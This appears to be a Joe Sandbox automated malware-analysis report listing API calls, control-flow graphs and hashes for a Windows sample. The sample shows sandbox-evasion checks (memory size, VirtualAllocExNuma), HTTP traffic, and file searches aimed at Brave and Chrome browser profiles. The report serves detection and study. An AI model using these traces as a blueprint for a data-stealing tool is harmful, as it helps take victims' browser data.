                                                • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02BE5AC0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                              • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                              • Sleep.KERNEL32(00001770), ref: 00416B04
                                              • CloseHandle.KERNEL32(?,00000000,?,02BE5AC0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                              • ExitProcess.KERNEL32 ref: 00416B22
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                              • String ID:
                                              • API String ID: 3511611419-0
                                              • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                              • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                              • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                              • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                              Control-flow Graph

                                              APIs
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                              • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ??2@$CrackInternetlstrlen
                                              • String ID: <
                                              • API String ID: 1683549937-4251816714
                                              • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                              • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                              • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                              • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1499 401281-401285 1496->1499 1497->1499 1501 401287 1499->1501 1502 40129a-40129d 1499->1502 1504 401292-401294 ExitProcess 1501->1504 1505 401289-401290 1501->1505 1505->1502 1505->1504
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                              • __aulldiv.LIBCMT ref: 00401258
                                              • __aulldiv.LIBCMT ref: 00401266
                                              • ExitProcess.KERNEL32 ref: 00401294
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                              • String ID: @
                                              • API String ID: 3404098578-2766056989
                                              • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                              • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                              • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                              • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1517 416af5-416b04 CloseHandle Sleep 1510->1517 1518 416ad9-416af1 call 41aad0 CreateEventA 1510->1518 1517->1508 1518->1511
                                              APIs
                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02BE5AC0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                              • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                              • Sleep.KERNEL32(00001770), ref: 00416B04
                                              • CloseHandle.KERNEL32(?,00000000,?,02BE5AC0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                              • ExitProcess.KERNEL32 ref: 00416B22
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                              • String ID:
                                              • API String ID: 941982115-0
                                              • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                              • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                              • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                              • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                              APIs
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02BEB110), ref: 00406303
                                                • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02BEA3E0,00000000,00000000,00400100,00000000), ref: 00406385
                                                • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                              • String ID: ERROR$ERROR
                                              • API String ID: 3287882509-2579291623
                                              • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                              • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                              • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                              • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocComputerNameProcess
                                              • String ID:
                                              • API String ID: 4203777966-0
                                              • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                              • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                              • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                              • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                              • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                              • ExitProcess.KERNEL32 ref: 00401143
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$AllocCurrentExitNumaVirtual
                                              • String ID:
                                              • API String ID: 1103761159-0
                                              • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                              • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                              • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                              • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02BBA6CE
                                              • Module32First.KERNEL32(00000000,00000224), ref: 02BBA6EE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884483895.0000000002BB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BB9000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2bb9000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction ID: 0f2feaf4a0bba0880aaafa8ec67f5e282f1e12c040137e86439d47cd90993f98
                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction Fuzzy Hash: A9F09076A007116FD7213BF9E88CBBE76E8FF49625F1005A9E643D11C0DBF0E8458A61
                                              APIs
                                              • SetErrorMode.KERNEL32(00000400,?,?,047E0223,?,?), ref: 047E0E19
                                              • SetErrorMode.KERNEL32(00000000,?,?,047E0223,?,?), ref: 047E0E1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction ID: 25d57d919eb2f76615e84c45edf2f220d9a93c073435560487530d9bce28bc3e
                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction Fuzzy Hash: 7AD0123114512877D7003AA5DC09BDD7B1CDF09B62F008021FB0DD9180C7B0954046E5
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Virtual$AllocFree
                                              • String ID:
                                              • API String ID: 2087232378-0
                                              • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                              • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                              • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                              • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                              APIs
                                                • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                              • ExitProcess.KERNEL32 ref: 004011C6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$Process$AllocName$ComputerExitUser
                                              • String ID:
                                              • API String ID: 1004333139-0
                                              • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                              • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                              • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                              • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02BBA3B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884483895.0000000002BB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BB9000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2bb9000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction ID: f66aa42c1131528d0a0b51555e5c029fcf0875ee94de40c941937e8f798d7ca2
                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction Fuzzy Hash: 01113979A00208EFDB01DF98C985E98BBF5EF08351F0580A4F9489B361D371EA90DF90
                                              APIs
                                              • wsprintfA.USER32 ref: 004138CC
                                              • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                              • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                              • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                              • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                              • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                              • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                              • API String ID: 1125553467-817767981
                                              • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                              • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                              • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                              • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                              • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                              • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                              • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                              • API String ID: 3334442632-726946144
                                              • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                              • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                              • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                              • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                              APIs
                                              • wsprintfA.USER32 ref: 0041492C
                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                              • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                              • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                              • FindClose.KERNEL32(000000FF), ref: 00414B92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID: %s\%s$%s\%s$%s\*
                                              • API String ID: 180737720-445461498
                                              • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                              • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                              • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                              • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                              APIs
                                              • wsprintfA.USER32 ref: 047F3B33
                                              • FindFirstFileA.KERNEL32(?,?), ref: 047F3B4A
                                              • lstrcat.KERNEL32(?,?), ref: 047F3B9C
                                              • StrCmpCA.SHLWAPI(?,00420F70), ref: 047F3BAE
                                              • StrCmpCA.SHLWAPI(?,00420F74), ref: 047F3BC4
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 047F3ECE
                                              • FindClose.KERNEL32(000000FF), ref: 047F3EE3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                              • String ID:
                                              • API String ID: 1125553467-0
